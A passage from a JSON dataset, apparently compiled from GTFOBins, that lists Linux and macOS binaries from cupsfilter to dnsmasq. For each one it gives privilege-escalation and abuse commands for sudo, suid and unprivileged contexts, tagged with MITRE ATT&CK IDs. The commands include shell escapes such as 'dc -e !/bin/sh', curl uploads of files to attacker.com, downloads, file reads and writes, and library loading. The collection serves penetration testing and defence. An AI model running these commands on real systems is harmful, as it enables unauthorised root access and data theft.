pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ctr/"]},{"id":"gtfo:cupsfilter:file-read:0:sudo","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:suid","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:cupsfilter:file-read:0:unprivileged","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"]},{"id":"gtfo:curl:download:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:download:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-read:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"curl file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:file-write:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncurl file:///path/to/temp-file -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:library-load:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"curl --engine /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:0:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary @/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:1:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl -X POST --data-binary DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:sudo","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:suid","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:curl:upload:2:unprivileged","toolId":"gtfo:curl","toolName":"curl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"curl gopher://attacker.com:12345/_DATA","description":"Data will be `\\r\\n` terminated.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/curl/"]},{"id":"gtfo:cut:file-read:0:sudo","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:suid","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:cut:file-read:0:unprivileged","toolId":"gtfo:cut","toolName":"cut","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cut -d '' -f1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cut/"]},{"id":"gtfo:dash:file-write:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:file-write:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:sudo","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:suid","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:dash:shell:0:unprivileged","toolId":"gtfo:dash","toolName":"dash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dash/"]},{"id":"gtfo:date:file-read:0:sudo","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:suid","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:date:file-read:0:unprivileged","toolId":"gtfo:date","toolName":"date","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"date -f /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/date/"]},{"id":"gtfo:dc:shell:0:sudo","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:suid","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dc:shell:0:unprivileged","toolId":"gtfo:dc","toolName":"dc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dc -e '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dc/"]},{"id":"gtfo:dd:file-read:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-read:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dd if=/path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:sudo","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:suid","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:dd:file-write:0:unprivileged","toolId":"gtfo:dd","toolName":"dd","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | dd of=/path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dd/"]},{"id":"gtfo:debugfs:shell:0:sudo","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:suid","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:debugfs:shell:0:unprivileged","toolId":"gtfo:debugfs","toolName":"debugfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"debugfs\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/debugfs/"]},{"id":"gtfo:dhclient:shell:0:sudo","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dhclient:shell:0:unprivileged","toolId":"gtfo:dhclient","toolName":"dhclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dhclient -sf /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dhclient/"]},{"id":"gtfo:dialog:file-read:0:sudo","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:suid","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:dialog:file-read:0:unprivileged","toolId":"gtfo:dialog","toolName":"dialog","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dialog --textbox /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dialog/"]},{"id":"gtfo:diff:file-read:0:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:0:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --line-format=%L /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:sudo","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:suid","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:diff:file-read:1:unprivileged","toolId":"gtfo:diff","toolName":"diff","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"diff --recursive /path/to/empty-dir /path/to/input-dir/","description":"This lists the content of a directory. `/path/to/empty-dir` can be any directory, but for convenience it is better to use an empty directory to avoid noise output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/diff/"]},{"id":"gtfo:dig:file-read:0:sudo","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:suid","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:unprivileged","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:distcc:shell:0:sudo","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:suid","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:unprivileged","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:dmesg:file-read:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmidecode:file-write:0:unprivileged","toolId":"gtfo:dmidecode","toolName":"dmidecode","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dmidecode --no-sysfs -d x.dmi --dump-bin /path/to/output-file","description":"It can be used to write files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\necho DATA >/path/to/temp-file\n./dmiwrite /path/to/temp-file x.dmi\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmidecode/"]},{"id":"gtfo:dmsetup:shell:0:sudo","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:suid","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:unprivileged","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dnf:command:0:sudo","toolId":"gtfo:dnf","toolName":"dnf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnf install -y x-1.0-1.noarch.rpm --disablerepo=*","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```\n\nThe `--disablerepo=*` option is used for targets without Internet connectivity, can be omitted otherwise.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnf/"]},{"id":"gtfo:dnsmasq:command:0:sudo","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege 